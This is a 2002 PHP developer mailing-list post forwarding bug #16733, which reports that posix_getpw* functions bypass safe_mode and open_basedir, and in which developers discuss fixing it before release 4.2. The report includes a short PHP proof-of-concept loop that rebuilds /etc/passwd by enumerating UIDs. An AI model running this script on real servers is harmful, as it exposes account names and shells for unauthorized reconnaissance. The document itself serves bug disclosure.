[PHP-DEV] [mfischer@php.net: Bug #16733 Updated: posix_getpw* bypasses safe_mode and open_basedir]

Mon, 22 Apr 2002 10:51:41 -0700 

    Derick,

    should this be fixed before releasing 4.2 (if it isn't too
    late anyway) ?

    posix is built by default ...

    - Markus


-- 
Please always Cc to me when replying to me on the lists.
GnuPG Key: http://guru.josefine.at/~mfischer/C2272BD0.asc
"Mind if I MFH ?" "What QA did you do on it?" "the usual?" "ah... none :)"
--- Begin Message --- 
 ID:               16733
 Updated by:       [EMAIL PROTECTED]
 Reported By:      [EMAIL PROTECTED]
-Status:           Open
+Status:           Analyzed
 Bug Type:         *General Issues
 Operating System: Unix
 PHP Version:      4.2.0
 New Comment:

Hmm. I was under the impression ext/posix is disabled non-cli SAPI's.

Checking this out.


Previous Comments:
------------------------------------------------------------------------

[2002-04-22 12:53:42] [EMAIL PROTECTED]

I noticed that many of the posix_* functions DO NOT check wether
safe_mode or open_basedir restrict access to the user database thus
allowing a user to rebuild a complete /etc/passwd without permissions
to read /etc/passwd or access the /etc directory.

This is dangerous in some cases where login are kept secret as it
allows a user to know what accounts have what privileges and what
accounts have access to a shell or not.
For now there is only one thing to do, disable these functions but i'm
pretty sure that adding checks to see values of safe_mode and/or
open_basedir would be a nice thing to do.

Here's a script that rebuilds /etc/passwd when safe_mode is enabled and
open_basedir is set to the user homedirectory:

<?
    for ($i = 0; $i < 60000; $i++)
      {
        if (($tab = @posix_getpwuid($i)) != NULL)
          {
            echo $tab['name'].":";
            echo $tab['passwd'].":";
            echo $tab['uid'].":";
            echo $tab['gid'].":";
            echo $tab['gecos'].":";
            echo $tab['dir'].":";
            echo $tab['shell']."<br>";
          }
      }
?>

On a very large system, if an execution time is set, this will not end
up, but hopefully the posix_getpwent() function is missing so the user
has to go through all possible uid's.

------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=16733&edit=1
--- End Message ---
-- 
PHP Development Mailing List <http://www.php.net/>
To unsubscribe, visit: http://www.php.net/unsub.php

Reply via email to